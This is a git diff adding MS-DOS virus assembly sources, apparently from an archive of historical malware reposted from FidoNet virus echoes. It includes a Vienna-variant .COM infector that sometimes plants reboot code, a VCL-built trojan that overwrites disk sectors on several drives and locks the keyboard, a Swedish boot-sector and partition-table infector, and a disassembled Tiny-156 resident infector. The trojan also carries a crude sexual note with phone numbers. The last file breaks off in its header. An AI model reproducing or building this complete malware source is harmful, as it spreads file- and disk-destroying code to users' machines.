diff --git a/MSDOS/Virus.MSDOS.Unknown.v-oneate.asm b/MSDOS/Virus.MSDOS.Unknown.v-oneate.asm new file mode 100644 index 00000000..202d4446 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.v-oneate.asm @@ -0,0 +1,618 @@ +;************************************************************************ +; V-ONEATE Virus (Virus: One in Ate) +; ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +; This is a variant of the Vienna strain which only runs its infectious +; code on an average 1 out of every 8 times it is run. When it is +; run, however, it infects 8 files. This is to make up for the +; slow infection rate. The 62 second flag has been modified for +; 61 seconds. The DOS v1.x checker is removed. Why? Do you +; know anyone who uses DOS v1.x? +;------------------------------------------------------------------------- + +MOV_CX MACRO X + DB 0B9H + DW X +ENDM + +CODE SEGMENT + ASSUME DS:CODE,SS:CODE,CS:CODE,ES:CODE + ORG $+0100H + +;***************************************************************************** +;Start out with a JMP around the remains of the original .COM file, into the +;virus. The actual .COM file was just an INT 20, followed by a bunch of NOPS. +;The rest of the file (first 3 bytes) are stored in the virus data area. +;***************************************************************************** + +VCODE: JMP virus + +;This was the rest of the original .COM file. Tiny and simple, this time + + NOP + NOP + NOP + NOP + NOP + NOP + NOP + NOP + NOP + NOP + NOP + NOP + NOP + NOP + NOP + +;************************************************************ +; The actual virus starts here +;************************************************************ + +v_start equ $ + +virus: +;******************************************************************* +; Start of Virus Code: Get current system time +;******************************************************************* + + MOV AH,2CH + INT 21H + + AND DH,07h ;Last 3 bits 0? (once in eight) + JNZ all_done + +;******************************************************************* +; The special "one in eight" infection. If the above line were in +; its original form, this code would be run 1/8 of the time, and +; rather than appending a copy of this virus to the 8 .COM files, +; the virus simply runs the .COM program normally. +; ****************************************************************** + + PUSH CX + MOV DX,OFFSET vir_dat ;This is where the virus data starts. + ; The 2nd and 3rd bytes get modified. + CLD ;Pointers will be auto INcremented + MOV SI,DX ;Access data as offset from SI + ADD SI,first_3 ;Point to original 1st 3 bytes of .COM + MOV DI,OFFSET 100H ;`cause all .COM files start at 100H + MOV CX,3 + REPZ MOVSB ;Restore original first 3 bytes of .COM + MOV SI,DX ;Keep SI pointing to the data area + +;************************************************************* +; Get DTA address into ES:BX +;************************************************************* + PUSH ES + MOV AH,2FH + INT 21H + +;************************************************************* +; Save the DTA address +;************************************************************* + + MOV [SI+old_dta],BX + MOV [SI+old_dts],ES ;Save the DTA address + + POP ES + +;************************************************************* +; Set DTA to point inside the virus data area +;************************************************************* + + MOV DX,dta ;Offset of new DTA in virus data area +; NOP ;MASM will add this NOP here + ADD DX,SI ;Compute DTA address + MOV AH,1AH + INT 21H ;Set new DTA to inside our own code + + PUSH ES + PUSH SI + MOV ES,DS:2CH + MOV DI,0 ;ES:DI points to environment + JMP ifect + +; Here when it's time to close it up & end +; ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + +all_done: + PUSH DS + +;********************************************************************** +; Restore old DTA +;********************************************************************** + + MOV AH,1AH + MOV DX,[SI+old_dta] + MOV DS,[SI+old_dts] + INT 21H + + POP DS + +;************************************************************************* +; Clear registers used, & do a weird kind of JMP 100. The weirdness comes +; in since the address in a real JMP 100 is an offset, and the offset +; varies from one infected file to the next. By PUSHing an 0100H onto the +; stack, we can RET to address 0100H just as though we JMPed there. +;********************************************************************** + +quit: + POP CX + XOR AX,AX + XOR BX,BX + XOR DX,DX + XOR SI,SI + MOV DI,OFFSET 0100H + PUSH DI + XOR DI,DI + + RET 0FFFFH + + + +; The Infect Cycle +; ~~~~~~~~~~~~~~~~ +ifect: MOV CX,0008h +infect: PUSH CX + CALL theifect + POP CX + LOOP infect + +;************************************************************ +; Find the "PATH=" string in the environment +;************************************************************ +theifect: ; The infection Cycle begins +find_path: + POP SI + PUSH SI ;Get SI back + ADD SI,env_str ;Point to "PATH=" string in data area + LODSB + MOV CX,OFFSET 8000H ;Environment can be 32768 bytes long + REPNZ SCASB ;Search for first character + MOV CX,4 + +;************************************************************ +; Loop to check for the next four characters +;************************************************************ + +check_next_4: + LODSB + SCASB + JNZ find_path ;If not all there, abort & start over + LOOP check_next_4 ;Loop to check the next character + + POP SI + POP ES + MOV [SI+path_ad],DI ;Save the address of the PATH + MOV DI,SI + ADD DI,wrk_spc ;File name workspace + MOV BX,SI ;Save a copy of SI + ADD SI,wrk_spc ;Point SI to workspace + MOV DI,SI ;Point DI to workspace + JMP SHORT slash_ok + +;********************************************************** +; Look in the PATH for more subdirectories, if any +;********************************************************** + +set_subdir: + CMP WORD PTR [SI+path_ad],0 ;Is PATH string ended? + JNZ found_subdir ;If not, there are more subdirectories + JMP all_done ;Else, we're all done + +;********************************************************** +; Here if there are more subdirectories in the path +;********************************************************** + +found_subdir: + PUSH DS + PUSH SI + MOV DS,ES:2CH ;DS points to environment segment + MOV DI,SI + MOV SI,ES:[DI+path_ad] ;SI = PATH address + ADD DI,wrk_spc ;DI points to file name workspace + +;*********************************************************** +; Move subdirectory name into file name workspace +;*********************************************************** + +move_subdir: + LODSB ;Get character + CMP AL,';' ;Is it a ';' delimiter? + JZ moved_one ;Yes, found another subdirectory + CMP AL,0 ;End of PATH string? + JZ moved_last_one ;Yes + STOSB ;Save PATH marker into [DI] + JMP SHORT move_subdir + +;****************************************************************** +; Mark the fact that we're looking through the final subdirectory +;****************************************************************** + +moved_last_one: + MOV SI,0 + +;****************************************************************** +; Here after we've moved a subdirectory +;****************************************************************** + +moved_one: + POP BX ;Pointer to virus data area + POP DS ;Restore DS + MOV [BX+path_ad],SI ;Address of next subdirectory + NOP + +;****************************************************************** +; Make sure subdirectory ends in a "\" +;****************************************************************** + + CMP CH,'\' ;Ends with "\"? + JZ slash_ok ;If yes + MOV AL,'\' ;Add one, if not + STOSB + +;****************************************************************** +; Here after we know there's a backslash at end of subdir +;****************************************************************** + +slash_ok: + MOV [BX+nam_ptr],DI ;Set filename pointer to name workspace + MOV SI,BX ;Restore SI + ADD SI,f_spec ;Point to "*.COM" + MOV CX,6 + REPZ MOVSB ;Move "*.COM",0 to workspace + + MOV SI,BX + +;******************************************************************* +; Find first string matching *.COM +;******************************************************************* + + MOV AH,4EH + MOV DX,wrk_spc +; NOP ;MASM will add this NOP here + ADD DX,SI ;DX points to "*.COM" in workspace + MOV CX,3 ;Attributes of Read Only or Hidden OK + INT 21H + + JMP SHORT find_first + +;******************************************************************* +; Find next ASCIIZ string matching *.COM +;******************************************************************* + +find_next: + MOV AH,4FH + INT 21H + +find_first: + JNB found_file ;Jump if we found it + JMP SHORT set_subdir ;Otherwise, get another subdirectory + +;******************************************************************* +; Here when we find a file +;******************************************************************* + +found_file: + MOV AX,[SI+dta_tim] ;Get time from DTA + AND AL,1FH ;Mask to remove all but seconds + CMP AL,1EH ;61 seconds -> already infected + JZ find_next ;If so, go find another file + + CMP WORD PTR [SI+dta_len],OFFSET 0FA00H ;Is the file too long? + JA find_next ;If too long, find another one + + CMP WORD PTR [SI+dta_len],0AH ;Is it too short? + JB find_next ;Then go find another one + + MOV DI,[SI+nam_ptr] ;DI points to file name + PUSH SI ;Save SI + ADD SI,dta_nam ;Point SI to file name + +;******************************************************************** +; Move the name to the end of the path +;******************************************************************** + +more_chars: + LODSB + STOSB + CMP AL,0 + JNZ more_chars ;Move characters until we find a 00 + +;******************************************************************** +; Get File Attributes +;******************************************************************** + + POP SI + MOV AX,OFFSET 4300H + MOV DX,wrk_spc ;Point to \path\name in workspace +; NOP ;MASM will add this NOP here + ADD DX,SI + INT 21H + + MOV [SI+old_att],CX ;Save the old attributes + +;******************************************************************** +; Rewrite the attributes to allow writing to the file +;******************************************************************** + + MOV AX,OFFSET 4301H ;Set attributes + AND CX,OFFSET 0FFFEH ;Set all except "read only" (weird) + MOV DX,wrk_spc ;Offset of \path\name in workspace +; NOP ;MASM will add this NOP here + ADD DX,SI ;Point to \path\name + INT 21H + +;******************************************************************** +; Open Read/Write channel to the file +;******************************************************************** + + MOV AX,OFFSET 3D02H ;Read/Write + MOV DX,wrk_spc ;Offset to \path\name in workspace +; NOP ;MASM will add this NOP here + ADD DX,SI ;Point to \path\name + INT 21H + + JNB opened_ok ;If file was opened OK + JMP fix_attr ;If it failed, restore the attributes + +;******************************************************************* +; Get the file date & time +;******************************************************************* + +opened_ok: + MOV BX,AX + MOV AX,OFFSET 5700H + INT 21H + + MOV [SI+old_tim],CX ;Save file time + MOV [SI+ol_date],DX ;Save the date + +;******************************************************************* +; Get current system time +;******************************************************************* + + MOV AH,2CH + INT 21H + + AND DH,7 ;Last 3 bits 0? (once in eight) + JNZ seven_in_eight + +;******************************************************************* +; The special "one in eight" infection. If the above line were in +; its original form, this code would be run 1/8 of the time, and +; rather than appending a copy of this virus to the .COM file, the +; file would get 5 bytes of code that reboot the system when the +; .COM file is run. +;******************************************************************* + + MOV AH,40H ;Write to file + MOV CX,5 ;Five bytes + MOV DX,SI + ADD DX,reboot ;Offset of reboot code in data area + INT 21H + + JMP SHORT fix_time_stamp + + NOP + +;****************************************************************** +; Here's where we infect a .COM file with this virus +;****************************************************************** + +seven_in_eight: + MOV AH,3FH + MOV CX,3 + MOV DX,first_3 +; NOP ;MASM will add this NOP here + ADD DX,SI + INT 21H ;Save first 3 bytes into the data area + + JB fix_time_stamp ;Quit, if read failed + + CMP AX,3 ;Were we able to read all 3 bytes? + JNZ fix_time_stamp ;Quit, if not + +;****************************************************************** +; Move file pointer to end of file +;****************************************************************** + + MOV AX,OFFSET 4202H + MOV CX,0 + MOV DX,0 + INT 21H + + JB fix_time_stamp ;Quit, if it didn't work + + MOV CX,AX ;DX:AX (long int) = file size + SUB AX,3 ;Subtract 3 (OK, since DX must be 0, here) + MOV [SI+jmp_dsp],AX ;Save the displacement in a JMP instruction + + ADD CX,OFFSET c_len_y + MOV DI,SI ;Point DI to virus data area + SUB DI,OFFSET c_len_x + ;Point DI to reference vir_dat, at start of pgm + MOV [DI],CX ;Modify vir_dat reference:2nd, 3rd bytes of pgm + +;******************************************************************* +; Write virus code to file +;******************************************************************* + + MOV AH,40H + + MOV_CX virlen ;Length of virus, in bytes + + MOV DX,SI + SUB DX,OFFSET codelen ;Length of virus code, gives starting + ; address of virus code in memory + INT 21H + + JB fix_time_stamp ;Jump if error + + CMP AX,OFFSET virlen ;All bytes written? + JNZ fix_time_stamp ;Jump if error + +;********************************************************************** +; Move file pointer to beginning of the file +;********************************************************************** + + MOV AX,OFFSET 4200H + MOV CX,0 + MOV DX,0 + INT 21H + + JB fix_time_stamp ;Jump if error + +;********************************************************************** +; Write the 3 byte JMP at the start of the file +;********************************************************************** + + MOV AH,40H + MOV CX,3 + MOV DX,SI ;Virus data area + ADD DX,jmp_op ;Point to the reconstructed JMP + INT 21H + +;********************************************************************** +; Restore old file date & time, with seconds modified to 62 +;********************************************************************** + +fix_time_stamp: + MOV DX,[SI+ol_date] ;Old file date + MOV CX,[SI+old_tim] ;Old file time + AND CX,OFFSET 0FFE0H + OR CX,1EH ;Seconds = 31/30 min = 61 seconds + MOV AX,OFFSET 5701H + INT 21H + +;********************************************************************** +; Close File +;********************************************************************** + + MOV AH,3EH + INT 21H + +;********************************************************************** +; Restore Old File Attributes +;********************************************************************** + +fix_attr: + MOV AX,OFFSET 4301H + MOV CX,[SI+old_att] ;Old Attributes + MOV DX,wrk_spc +; NOP ;MASM will add this NOP + ADD DX,SI ;DX points to \path\name in workspace + INT 21H + RET +; End of Infection loop +; ^^^^^^^^^^^^^^^^^^^^^ + + +;************************************************************************ +;The virus data starts here. It's accessed off the SI register, per the +; comments as shown +;************************************************************************ + +vir_dat EQU $ + + ;Use this with (SI + old_dta) +olddta_ DW 0 ;Old DTA offset + + ;Use this with (SI + old_dts) +olddts_ DW 0 ;Old DTA segment + + ;Use this with (SI + old_tim) +oldtim_ DW 0 ;Old Time + + ;Use this with (SI + ol_date) +oldate_ DW 0 ;Old date + + ;Use this with (SI + old_att) +oldatt_ DW 0 ;Old file attributes + +;Here's where the first three bytes of the original .COM file go.(SI + first_3) + +first3_ EQU $ + INT 20H + NOP + +;Here's where the new JMP instruction is worked out + + ;Use this with (SI + jmp_op) +jmpop_ DB 0E9H ;Start of JMP instruction + + ;Use this with (SI + jmp_dsp) +jmpdsp_ DW 0 ;The displacement part + +;This is the type of file we're looking to infect. (SI + f_spec) + +fspec_ DB '*.COM',0 + + ;Use this with (SI + path_ad) +pathad_ DW 0 ;Path address + + ;Use this with (SI + nam_ptr) +namptr_ DW 0 ;Pointer to start of file name + + ;Use this with (SI + env_str) +envstr_ DB 'PATH=' ;Find this in the environment + + ;File name workspace (SI + wrk_spc) +wrkspc_ DB 40h dup (0) + + ;Use this with (SI + dta) +dta_ DB 16h dup (0) ;Temporary DTA goes here + + ;Use this with (SI + dta_tim) +dtatim_ DW 0,0 ;Time stamp in DTA + + ;Use this with (SI + dta_len) +dtalen_ DW 0,0 ;File length in the DTA + + ;Use this with (SI + dta_nam) +dtanam_ DB 0Dh dup (0) ;File name in the DTA + + ;Use this with (SI + reboot) +reboot_ DB 0EAH,0F0H,0FFH,0FFH,0FFH ;Five byte FAR JMP to FFFF:FFF0 + +lst_byt EQU $ ;All lines that assemble into code are + ; above this one + +;***************************************************************************** +;The virus needs to know a few details about its own size and the size of its +; code portion. Let the assembler figure out these sizes automatically. +;***************************************************************************** + +virlen = lst_byt - v_start ;Length, in bytes, of the entire virus +codelen = vir_dat - v_start ;Length of virus code, only +c_len_x = vir_dat - v_start - 2 ;Displacement for self-modifying code +c_len_y = vir_dat - v_start + 100H ;Code length + 100h, for PSP + +;***************************************************************************** +;Because this code is being appended to the end of an executable file, the +; exact address of its variables cannot be known. All are accessed as offsets +; from SI, which is represented as vir_dat in the below declarations. +;***************************************************************************** + +old_dta = olddta_ - vir_dat ;Displacement to the old DTA offset +old_dts = olddts_ - vir_dat ;Displacement to the old DTA segment +old_tim = oldtim_ - vir_dat ;Displacement to old file time stamp +ol_date = oldate_ - vir_dat ;Displacement to old file date stamp +old_att = oldatt_ - vir_dat ;Displacement to old attributes +first_3 = first3_ - vir_dat ;Displacement-1st 3 bytes of old .COM +jmp_op = jmpop_ - vir_dat ;Displacement to the JMP opcode +jmp_dsp = jmpdsp_ - vir_dat ;Displacement to the 2nd 2 bytes of JMP +f_spec = fspec_ - vir_dat ;Displacement to the "*.COM" string +path_ad = pathad_ - vir_dat ;Displacement to the path address +nam_ptr = namptr_ - vir_dat ;Displacement to the filename pointer +env_str = envstr_ - vir_dat ;Displacement to the "PATH=" string +wrk_spc = wrkspc_ - vir_dat ;Displacement to the filename workspace +dta = dta_ - vir_dat ;Displacement to the temporary DTA +dta_tim = dtatim_ - vir_dat ;Displacement to the time in the DTA +dta_len = dtalen_ - vir_dat ;Displacement to the length in the DTA +dta_nam = dtanam_ - vir_dat ;Displacement to the name in the DTA +reboot = reboot_ - vir_dat ;Displacement to the 5 byte reboot code + + CODE ENDS +END VCODE + + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir20.asm b/MSDOS/Virus.MSDOS.Unknown.vir20.asm new file mode 100644 index 00000000..ad35f568 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir20.asm @@ -0,0 +1,132 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 10 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:11 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : VCLMIKES.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Ron Toler, 2:283/718 (06 Nov 94 16:27) +;* To : Viral Doctor +;* Subj : VCLMIKES.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Ron.Toler@f718.n283.z2.fidonet.org +; MIKESICA.ASM -- Mike Sica v1.0 +; Created with Nowhere Man's Virus Creation Laboratory v1.00 +; Written by Digital Justice + +virus_type equ 3 ; Trojan Horse +is_encrypted equ 0 ; We're not encrypted +tsr_virus equ 0 ; We're not TSR + +code segment byte public + assume cs:code,ds:code,es:code,ss:code + org 0100h + +start label near + +main proc near +stop_tracing: mov cx,09EBh + mov ax,0FE05h ; Acutal move, plus a HaLT + jmp $-2 + add ah,03Bh ; AH now equals 025h + jmp $-10 ; Execute the HaLT + mov bx,offset null_vector ; BX points to new routine + push cs ; Transfer CS into ES + pop es ; using a PUSH/POP + int 021h + mov al,1 ; Disable interrupt 1, too + int 021h + jmp short skip_null ; Hop over the loop +null_vector: jmp $ ; An infinite loop +skip_null: mov byte ptr [lock_keys + 1],130 ; Prefetch unchanged +lock_keys: mov al,128 ; Change here screws DEBUG + out 021h,al ; If tracing then lock keyboard + + mov ah,0Fh ; BIOS get video mode function + int 010h + xor ah,ah ; BIOS set video mode function + int 010h + + mov dx,0045h ; First argument is 69 + push es ; Save ES + mov ax,040h ; Set extra segment to 040h + mov es,ax ; (ROM BIOS) + mov word ptr es:[013h],dx ; Store new RAM ammount + pop es ; Restore ES + + mov si,0001h ; First argument is 1 + push es ; Save ES + xor ax,ax ; Set the extra segment to + mov es,ax ; zero (ROM BIOS) + shl si,1 ; Convert to word index + mov word ptr [si + 0407h],0 ; Zero LPT port address + pop es ; Restore ES + + mov si,0001h ; First argument is 1 + push es ; Save ES + xor ax,ax ; Set the extra segment to + mov es,ax ; zero (ROM BIOS) + shl si,1 ; Convert to word index + mov word ptr [si + 03FEh],0 ; Zero COM port address + pop es ; Restore ES + + mov ax,0002h ; First argument is 2 + mov cx,0064h ; Second argument is 100 + cli ; Disable interrupts (no Ctrl-C) + cwd ; Clear DX (start with sector 0) +trash_loop: int 026h ; DOS absolute write interrupt + dec ax ; Select the previous disk + cmp ax,-1 ; Have we gone too far? + jne trash_loop ; If not, repeat with new drive + sti ; Restore interrupts + + cli ; Clear the interrupt flag + hlt ; HaLT the computer + jmp short $ ; Just to make sure + + mov cx,0045h ; First argument is 69 + jcxz beep_end ; Exit if there are no beeps + mov ax,0E07h ; BIOS display char., BEL +beep_loop: int 010h ; Beep + loop beep_loop ; Beep until --CX = 0 +beep_end: + + + mov ax,04C00h ; DOS terminate function + int 021h +main endp + +vcl_marker db "[VCL]",0 ; VCL creation marker + + +note db "!! Written By Mike Sica !!" + db "I Suck Big Phat Hairy Cocks!!" + db "Call Anytime Phor Good Head:" + db "794-0533 or 794-3626" + db "Both In The 804 Area Code!!" + +finish label near + +code ends + end main + +;-+- GEcho 1.10+ +; + Origin: Data Fellows BBS (2:283/718) +;============================================================================= + +;Yoo-hooo-oo, -! +; +; +; The MeeO + +;/x Include false conditionals in listing +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir21.asm b/MSDOS/Virus.MSDOS.Unknown.vir21.asm new file mode 100644 index 00000000..0471f199 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir21.asm @@ -0,0 +1,277 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 11 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:11 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : SWEDISH.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Daniel Hendry, 2:283/718 (06 Nov 94 16:28) +;* To : Brad Frazee +;* Subj : SWEDISH.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Daniel.Hendry@f718.n283.z2.fidonet.org +;; +; Lgger gamla bootsectorn p sida 1, spr 0, sector 3. +; sida 0, spr 0, sector 7 p HD. + +Code Segment + Assume cs:Code + Org 0000h + +Main Proc Far + db 0EAh,05h,00h,0C0h,07h + + jmp Near Ptr Init ; Hoppa frbi variabler och nya int13h + +; Variabler + +Old13h dd 0 ; Gamla vectorn till diskfunktionerna. +TmpVec dd 0 ; Temporr vec. vid ndring av int 13. +BootPek dw 0003h,0100h +; Slut p variabler +Int13h Proc Near + push ds + push ax + push bx + + cmp dl,00h ; Drive A + jne Exit + + cmp ah,02h + jb Exit + cmp ah,04h + ja Exit ; Kolla s att func. 2-4 + + sub ax,ax + mov ds,ax + mov bx,043Fh ; Motor status byte. + test Byte Ptr [bx],01h ; Testa om motorn i A: r p.. + jnz Exit ; Nej,hoppa till gamla int 13h + + call Smitta + +Exit: pop bx + pop ax + pop ds + jmp [Old13h] + +Smitta Proc Near + push cx + push dx + push si + push di + push es + + push cs + pop es + push cs + pop ds + + mov si,0004h ; Max antal frsk. + +Retry: mov ax,0201h ; Ls en sector + mov bx,0200h ; Ls hit. + mov cx,0001h ; Spr 0 Sector 1 + sub dx,dx ; Sida 0 Drive 0 + pushf + call [Old13h] ; Ls in booten. + + jnc OK + + dec si + jz Slut ; Hoppa ur om fel. + jmp Retry ; Frsk max 4 gnger. + +OK: mov si,0200h + sub di,di + cld + lodsw + cmp ax,[di] + jne L2 + lodsw + cmp ax,[di+2] + jne L2 + jmp Slut + +L2: mov ax,0301h ; Skriv en sector. + mov bx,0200h + mov cx,0003h ; Spr 0 Sector 3 + mov dx,0100h ; Sida 1 Drive 0 + pushf + call [Old13h] ; Flytta boot sectorn. + + mov ax,0301h + sub bx,bx + mov cx,0001h + sub dx,dx + pushf + call [Old13h] ; Skriv ner viruset till booten. + +Slut: pop es + pop di + pop si + pop dx + pop cx + ret +Smitta Endp +Int13h Endp + +Init: sub ax,ax + mov ds,ax ; Nollar ds fr att ndra vect. + + cli + mov ss,ax + mov sp,7C00h + sti ; Stter upp en ny stack. + + push cs + pop es + mov di,Offset Old13h + mov si,004Ch + mov cx,0004h + cld + rep movsb ; Flytta int 13h vectorn. + + mov bx,0413h + mov ax,[bx] ; Minnesstorleken till ax. + dec ax + dec ax + mov [bx],ax ; Reservera plats fr viruset. + + mov cl,06h + shl ax,cl + mov es,ax ; Omvandla till segment addres. + + mov Word Ptr TmpVec,Offset Int13h + mov Word Ptr TmpVec+2,es + push es + sub ax,ax + mov es,ax + push cs + pop ds + mov si,Offset TmpVec + mov di,004Ch + mov cx,0004h + rep movsb + pop es + + sub si,si + mov di,si + mov cx,0200h ; Hela viruset + lite till. + rep movsb + + mov ax,Offset Here + push es + push ax + ret ; Hoppa till viruset. + +Here: sub ax,ax + int 13h ; terstll driven + + sub ax,ax + mov es,ax + mov ax,0201h ; Ls en sector funk. + mov bx,7C00h ; Hit laddas booten normalt. + mov cx,BootPek + mov dx,BootPek+2 + int 13h + + push cs + pop es + mov ax,0201h + mov bx,0200h + mov cx,0001h + mov dx,0080h + int 13h ; Ls in partions tabellen. + jc Over + push cs + pop ds + mov si,0200h + sub di,di + lodsw + cmp ax,[di] ; Kolla om den r smittad. + jne HdInf + lodsw + cmp ax,[di+2] + jne HdInf + +Over: mov BootPek,0003h + mov BootPek+2,0100h + sub bx,bx + push bx + mov bx,7C00h + push bx + ret ; Kr den gamla booten. + +HdInf: mov BootPek,0007h + mov BootPek+2,0080h + + mov ax,0301h + mov bx,0200h + mov cx,0007h + mov dx,0080h + int 13h ; Flytta orgin. part.tabellen. + jc Over + + push cs + pop ds + push cs + pop es + mov si,03BEh + mov di,01BEh + mov cx,0042h + cld + rep movsb ; Kopiera part. data till viruset. + + mov ax,0301h + sub bx,bx + mov cx,0001h + mov dx,0080h + int 13h ; Skriv viruset till part. tabellen. + + + sub ax,ax + mov es,ax ; Kolla om msg:et ska skrivas ut. + test Byte Ptr es:[046Ch],07h + jnz HdInf1 + + mov si,Offset Txt ; Detta utfrs bara om man bootar frn + cld ; diskett. +Foo1: lodsb + cmp al,00h + je HdInf1 + mov ah,0Eh + sub bx,bx + int 10h + jmp Foo1 + +HdInf1: jmp Over + +Slutet Label Byte ; Anvnds fr att veta var slutet r. + +Txt db 07h,0Ah,0Dh,'The Swedish Disaster I',0Ah,0Dh,00h + +Main Endp +Code Ends + End + +;-+- GEcho 1.00 +; + Origin: The PRO-Point on a PRO-BBS and a PRO-*.* ...Ciaro?... (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/3 Enable 32-bit processing +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir22.asm b/MSDOS/Virus.MSDOS.Unknown.vir22.asm new file mode 100644 index 00000000..75dde233 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir22.asm @@ -0,0 +1,214 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 12 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:11 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : TINY_156.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Gilbert Holleman, 2:283/718 (06 Nov 94 16:30) +;* To : Graham Allen +;* Subj : TINY_156.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Gilbert.Holleman@f718.n283.z2.fidonet.org + page ,132 + name TINY156 + title The 'Tiny' virus, version TINY-156 + .radix 16 + +; ͻ +; Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 +; Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 +; +; The 'Tiny' Virus, version TINY-156 +; Disassembled by Vesselin Bontchev, September 1990 +; +; Copyright (c) Vesselin Bontchev 1989, 1990 +; +; This listing is only to be made available to virus researchers +; or software writers on a need-to-know basis. +; ͼ + +; The disassembly has been tested by re-assembly using MASM 5.0. + +code segment + assume cs:code, ds:code + + org 100 + +seg_60 equ 600 +v_len equ v_end-first4 + +start: + jmp v_entry ; Jump to virus code + db 'M' ; Virus signature + mov ax,4C00 ; Program terminate + int 21 + +; The original first 4 bytes of the infected file: + +first4 db 0EBh, 2, 90, 90 + +v_entry: + mov si,0FF ; Determine the start addres of the virus body + add si,[si+2] + + mov di,offset start ; Put the addres of program start on the stack + push di ; Now a Near RET instruction will jump there + + push ax ; Save AX (to keep programs as DISKCOPY happy) + + movsw ; Restore the original first 4 bytes + movsw + + mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h) + xor cx,cx ; ES := 0 + mov es,cx + mov cl,v_len-2 ; CX := virus length + lodsw ; Check if virus is present in memory + scasw + je run ; Just run the program if so + +; Virus not in memory. Install it there: + + dec di ; Adjust DI + dec di + stosw ; Store the first word of the virus body + rep movsb ; Store the rest of the virus + + mov di,32*4 ; Old INT 21h handler will be moved to INT 32h + mov ax,int_21-first4+seg_60 + +; Move the INT 21h handler to INT 32h and +; install int_21 as new INT 21h handler: + + xchg ax,cx +vect_cpy: + xchg ax,cx + xchg ax,word ptr es:[di-(32-21)*4] + stosw + jcxz vect_cpy ; Loop until done + +run: + pop ax ; Restore AX + push ds ; ES := DS + pop es + +; Jump to program start via funny RET instruction: + + ret + +int_21: ; New INT 21h handler + cmp ax,4B00 ; EXEC function call? + jne end_21 ; Exit if not + + push ax ; Save registers used + push bx + push cx + push dx + push di + push ds + push es + + push cs ; ES := CS + pop es + + mov ax,3D02 ; Open the file for both reading and writting + int 32 + jc end_exec ; Exit on error + xchg ax,bx ; Save the file handle in BX + + mov al,0 + call lseek + + mov ah,3F ; Read the first 4 bytes of the file + mov di,dx ; Save first4 address in DI + push cs ; DS := CS + pop ds + int 32 ; Do it + +; Check whether the file is already infected or is an .EXE file. +; The former contains the character `M' in its 3rd byte and +; the latter contains it either in the 0th or in the 1st byte. + + push di ; Save DI + mov al,'M' ; Look for `M' + repne scasb + pop di ; Restore DI + je close ; Exit if file not suitable for infection + + mov al,2 ; Seek to the end of file + call lseek + + push ax ; Save file length + + mov cl,v_len ; Length of virus body + mov ah,40 ; Append virus to file + int 32 ; Do it + + mov al,0 ; Seek to the file beginning + call lseek + + mov al,0E9 ; Near JMP opcode + stosb ; Form the first instruction of the file + pop ax ; Restore file length in AX + inc ax + stosw ; Form the JMP's opperand + mov al,'M' ; Add a `M' character to mark the file + stosb ; as infected + + mov ah,40 + int 32 ; Do it + +close: + mov ah,3E ; Close the file + int 32 + +end_exec: + pop es ; Restore used registers + pop ds + pop di + pop dx + pop cx + pop bx + pop ax + +; Exit through the original INT 21h handler: + +end_21: + jmp dword ptr cs:[32*4] + +lseek: + mov ah,42 ; Lseek either to file beginning or to file end + xor cx,cx + xor dx,dx + int 32 ; Do it + + mov dh,6 ; Put 6 in DH and 4 in CL + mov cl,4 + ret ; Done + +v_end equ $ ; End of virus body + +code ends + end start + +;-+- Concord/QWK O.O1 Beta-7 +; + Origin: Miami Beach BBS - Nijmegen Nl - 080-732083 - ZyX 19K2 (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/m# Allow # multiple passes to resolve forward references +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir23.asm b/MSDOS/Virus.MSDOS.Unknown.vir23.asm new file mode 100644 index 00000000..f1a7ba76 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir23.asm @@ -0,0 +1,210 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 13 of 54 +; From : MeteO 2:5030/136 Tue 09 